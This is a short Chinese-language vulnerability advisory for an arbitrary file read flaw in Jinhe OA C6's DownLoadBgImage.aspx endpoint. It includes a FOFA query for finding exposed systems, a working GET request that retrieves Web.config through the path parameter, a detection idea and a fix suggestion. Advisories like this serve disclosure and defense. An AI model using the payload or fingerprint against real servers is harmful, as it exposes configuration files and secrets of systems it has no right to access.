金和OA C6 DownLoadBgImage任意文件读取漏洞

金和OA C6 DownLoadBgImage任意文件读取漏洞

漏洞描述

金和C6数据库是一款针对企业信息化管理而设计的高级数据库管理系统，主要应用于企业资源规划（ERP）、客户关系管理（CRM）以及办公自动化（OA）等领域。金和OA C6 接口JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx 其参数path存在文件遍历漏洞可读取系统任意文件，造成信息泄露。

威胁等级: 高危

漏洞分类: 信息泄露

涉及厂商及产品：金和C6

应用指纹及检出思路

此用存在二次开发的可能性，接口存在JHSoft 关键词可大致判断

fofa：body="JHSoft.Web.AddMenu" || app="金和网络-金和OA"

漏洞复现

GET /C6/JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx/?path=/C6/Web.config HTTP/1.1 Host:

检测思路

检测web.config关键字段即可。如 等。

修复建议

设置访问控制策略，禁用此接口